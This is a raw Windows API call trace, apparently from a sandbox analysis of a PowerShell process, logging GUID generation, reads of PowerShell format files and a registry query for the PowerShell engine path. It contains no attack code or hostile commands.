	[0650.066] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x9428447c, Data2=0x473c, Data3=0x4cbd, Data4=([0]=0x9f, [1]=0xe, [2]=0xa2, [3]=0x62, [4]=0x7e, [5]=0xf2, [6]=0x9a, [7]=0x90))) returned 0x0
	[0650.066] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x1a7d795f, Data2=0x6129, Data3=0x4e93, Data4=([0]=0x86, [1]=0x8f, [2]=0x97, [3]=0x3a, [4]=0x23, [5]=0x2f, [6]=0xea, [7]=0xe8))) returned 0x0
	[0650.067] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x168ceec9, Data2=0x4ff5, Data3=0x4036, Data4=([0]=0x9a, [1]=0xec, [2]=0x60, [3]=0x88, [4]=0x34, [5]=0x60, [6]=0xcd, [7]=0xc))) returned 0x0
	[0650.067] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x6949cb3a, Data2=0xb82, Data3=0x446a, Data4=([0]=0xb8, [1]=0x28, [2]=0xe4, [3]=0x4d, [4]=0x24, [5]=0x2d, [6]=0x55, [7]=0xc4))) returned 0x0
	[0650.067] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf4896e30, Data2=0x40d3, Data3=0x4ff3, Data4=([0]=0x9f, [1]=0xf4, [2]=0x7b, [3]=0x1c, [4]=0xad, [5]=0xb, [6]=0x30, [7]=0xff))) returned 0x0
	[0650.067] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x768e4d2c, Data2=0x84aa, Data3=0x441b, Data4=([0]=0xb8, [1]=0xec, [2]=0xf1, [3]=0xe0, [4]=0x66, [5]=0x7d, [6]=0x50, [7]=0xfa))) returned 0x0
	[0650.067] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x6baa3ad5, Data2=0xc097, Data3=0x46fd, Data4=([0]=0x85, [1]=0xf1, [2]=0x24, [3]=0x82, [4]=0x76, [5]=0x44, [6]=0x63, [7]=0xd4))) returned 0x0
	[0650.067] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc07d5fc4, Data2=0x57c1, Data3=0x40e1, Data4=([0]=0xa6, [1]=0x55, [2]=0x5c, [3]=0x76, [4]=0x60, [5]=0xc7, [6]=0x11, [7]=0xd4))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x4a85543a, Data2=0x6fee, Data3=0x4b97, Data4=([0]=0xbe, [1]=0xaa, [2]=0xa, [3]=0xad, [4]=0x3b, [5]=0xea, [6]=0x2c, [7]=0x3b))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xcb1cb771, Data2=0xb38b, Data3=0x4676, Data4=([0]=0xb5, [1]=0x49, [2]=0xe9, [3]=0x24, [4]=0x87, [5]=0xa0, [6]=0xc1, [7]=0x7e))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x81a68d84, Data2=0x956f, Data3=0x4255, Data4=([0]=0xa5, [1]=0x9a, [2]=0x29, [3]=0x20, [4]=0x47, [5]=0x82, [6]=0xab, [7]=0xc2))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc7a58b11, Data2=0x99c0, Data3=0x468f, Data4=([0]=0xbc, [1]=0x90, [2]=0x89, [3]=0xcd, [4]=0x6e, [5]=0x5d, [6]=0xde, [7]=0x1a))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x9c39e27d, Data2=0x3aeb, Data3=0x4bd5, Data4=([0]=0x9c, [1]=0x7f, [2]=0x16, [3]=0xe4, [4]=0xfa, [5]=0x98, [6]=0xe7, [7]=0x75))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xafff20ed, Data2=0xe138, Data3=0x4c68, Data4=([0]=0x97, [1]=0x3c, [2]=0x50, [3]=0xa5, [4]=0x3d, [5]=0xe9, [6]=0x69, [7]=0x9c))) returned 0x0
	[0650.068] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x62c74452, Data2=0xbf32, Data3=0x4d8a, Data4=([0]=0x84, [1]=0x58, [2]=0x86, [3]=0xf2, [4]=0xce, [5]=0xb8, [6]=0xc4, [7]=0x9c))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2a1f4583, Data2=0x7144, Data3=0x474a, Data4=([0]=0x84, [1]=0x11, [2]=0xc8, [3]=0x8a, [4]=0x83, [5]=0xb7, [6]=0x2, [7]=0x1a))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xa12a3ca5, Data2=0x2d6, Data3=0x49c1, Data4=([0]=0x9f, [1]=0x43, [2]=0xa, [3]=0x8a, [4]=0xe5, [5]=0x54, [6]=0x4e, [7]=0x9f))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x87c419b7, Data2=0x15c5, Data3=0x4d5a, Data4=([0]=0x9a, [1]=0xf2, [2]=0x96, [3]=0x29, [4]=0x70, [5]=0xd2, [6]=0x65, [7]=0x2f))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x47a748fd, Data2=0xe30e, Data3=0x47f4, Data4=([0]=0xa9, [1]=0xcf, [2]=0x7e, [3]=0x7, [4]=0xd2, [5]=0x6d, [6]=0xb1, [7]=0x4e))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x1ec8f4f6, Data2=0x99, Data3=0x4d08, Data4=([0]=0xb6, [1]=0x79, [2]=0x42, [3]=0xa8, [4]=0xfe, [5]=0xe6, [6]=0x43, [7]=0xb1))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x618964ff, Data2=0xf6b0, Data3=0x4469, Data4=([0]=0x87, [1]=0x2d, [2]=0x9d, [3]=0xbc, [4]=0xef, [5]=0xf0, [6]=0x19, [7]=0xc9))) returned 0x0
	[0650.069] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x13670ecd, Data2=0x8fa9, Data3=0x44bf, Data4=([0]=0xad, [1]=0x39, [2]=0x49, [3]=0xaa, [4]=0xf4, [5]=0x47, [6]=0xe8, [7]=0x44))) returned 0x0
	[0651.475] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xd33f41ad, Data2=0x64b4, Data3=0x4a8b, Data4=([0]=0xa4, [1]=0x3a, [2]=0x63, [3]=0x1c, [4]=0x23, [5]=0xe9, [6]=0xa4, [7]=0xf3))) returned 0x0
	[0651.475] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0651.475] GetFileType (hFile=0x324) returned 0x1
	[0651.476] SetErrorMode (uMode=0x1) returned 0x1
	[0651.476] GetFileType (hFile=0x324) returned 0x1
	[0651.476] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.478] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.478] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.479] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.479] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.479] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.479] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x119, lpOverlapped=0x0) returned 1
	[0651.479] ReadFile (in: hFile=0x324, lpBuffer=0x2e4ae30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e4ae30*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0651.479] CloseHandle (hObject=0x324) returned 1
	[0651.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0651.480] SetErrorMode (uMode=0x1) returned 0x1
	[0651.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0651.480] SetErrorMode (uMode=0x1) returned 0x1
	[0651.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0651.480] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0651.480] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0651.481] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35c80
	[0651.481] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35c80, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0651.481] CoTaskMemFree (pv=0x1ba35c80) 
	[0651.481] RegCloseKey (hKey=0x324) returned 0x0
	[0651.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0651.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0651.482] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x96085c9e, Data2=0x4e31, Data3=0x41e0, Data4=([0]=0xa9, [1]=0xf8, [2]=0xc5, [3]=0xce, [4]=0x97, [5]=0x64, [6]=0x4a, [7]=0xd3))) returned 0x0
	[0651.482] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x268634da, Data2=0x1607, Data3=0x4632, Data4=([0]=0xb5, [1]=0x7a, [2]=0x25, [3]=0x33, [4]=0x75, [5]=0xe2, [6]=0xb0, [7]=0xd9))) returned 0x0
	[0651.482] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc5998780, Data2=0xb864, Data3=0x4946, Data4=([0]=0xa4, [1]=0x51, [2]=0x21, [3]=0xb, [4]=0xda, [5]=0x28, [6]=0xa1, [7]=0x43))) returned 0x0
	[0651.482] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc005b7ee, Data2=0x32ec, Data3=0x46d1, Data4=([0]=0x9b, [1]=0x2f, [2]=0x9b, [3]=0x9b, [4]=0x36, [5]=0xef, [6]=0xec, [7]=0x4d))) returned 0x0
	[0651.483] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0651.483] GetFileType (hFile=0x324) returned 0x1
	[0651.483] SetErrorMode (uMode=0x1) returned 0x1
	[0651.483] GetFileType (hFile=0x324) returned 0x1
	[0651.483] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.487] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.487] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.487] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.487] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.487] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.487] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.488] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.489] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.489] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.490] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.490] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.490] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.491] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.491] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.492] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.495] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.495] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.495] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.496] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.496] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.496] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.497] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.497] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.497] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.498] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.498] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.498] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.498] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.499] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.499] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.499] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.504] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.504] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.505] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.505] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.505] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.506] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.506] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.506] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.506] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.507] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.507] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.507] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.508] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.508] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0651.508] ReadFile (in: hFile=0x324, lpBuffer=0x2ea6fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ea6fd0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
